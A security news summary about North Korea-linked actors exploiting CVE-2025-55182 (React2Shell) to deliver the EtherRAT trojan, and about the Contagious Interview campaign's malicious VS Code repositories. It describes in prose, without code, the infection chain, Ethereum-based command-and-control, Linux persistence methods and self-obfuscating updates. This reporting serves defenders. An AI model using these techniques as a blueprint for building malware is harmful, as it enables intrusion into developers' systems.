North Korean Hackers Push EtherRAT via React2Shell

North Korea-linked threat actors are exploiting React2Shell, a critical React Server Components (RSC) flaw tracked as CVE-2025-55182 (CVSS 10.0), to deliver a newly uncovered remote access trojan called EtherRAT, researchers at Sysdig report.

Why it matters

• EtherRAT is a major escalation from prior React2Shell abuse, shifting from opportunistic cryptomining and credential theft to stealthy, persistent access designed for long-term operations.
• The activity overlaps with the long-running "Contagious Interview" campaign that targets blockchain and Web3 developers with fake job offers and coding tests across LinkedIn, Upwork, and Fiverr. Socket calls it one of the most prolific npm ecosystem attacks.

How EtherRAT works

• Initial access: Attackers exploit CVE-2025-55182 to run a Base64-encoded shell command that retrieves a deployment script (via curl, with wget/python3 as fallbacks).
• Environment prep: The script downloads Node.js v20.10.0 from nodejs.org, writes an encrypted payload blob and an obfuscated JavaScript dropper, cleans up traces, then executes the dropper.
• Payload launch: The dropper decrypts EtherRAT with a hard-coded key and runs it using the downloaded Node.js binary.

Ethereum-powered C2 with consensus

• EtherRAT uses EtherHiding to resolve its command-and-control (C2) URL from an Ethereum smart contract every five minutes.
• To resist takedowns and poisoning, it queries nine public Ethereum RPC endpoints in parallel and selects the URL returned by majority vote.
• Similar techniques were seen in npm packages colortoolsv2 and mimelib2, previously used to deliver downloader malware.

Post-compromise behavior

• Ultra-frequent tasking: Polls the C2 every 500 ms and executes any response over 10 characters as JavaScript on the host.
• Five-layer persistence on Linux:
  • Systemd user service
  • XDG autostart entry
  • Cron jobs
  • .bashrc injection
  • Profile injection
• Self-updating: Sends its source to an API, receives a functionally identical but differently obfuscated update, overwrites itself, and relaunches—helping evade static signature detection.
• Campaign overlaps: Loader patterns align with BeaverTail, a known JavaScript stealer/downloader, reinforcing ties to Contagious Interview.

Contagious Interview evolves: from npm to VS Code

• A new variant urges victims to clone malicious repos (GitHub, GitLab, Bitbucket) and open them in Visual Studio Code.
• A tasks.json file with runOptions.runOn: 'folderOpen' auto-executes on project open, pulling a loader via curl or wget.
• On Linux, a chain of scripts (including vscode-bootstrap.sh, package.json, and env-setup.js) ultimately launches BeaverTail and InvisibleFerret.
• OpenSourceMalware tracked 13 campaign versions across 27 GitHub accounts and 11 BeaverTail builds, from April 22, 2025 to December 1, 2025. Operators have largely shifted hosting to Vercel, abandoning Fly.io, Platform.sh, Render, and others.

Bottom line
Sysdig assesses EtherRAT as a sophisticated, rapidly evolving implant that complicates traditional takedown and detection efforts through Ethereum-backed C2, multi-layer persistence, and agile updates. Whether it reflects a new DPRK pivot or technique reuse, defenders face a high-resilience threat targeting developer ecosystems.

Source: The Hacker News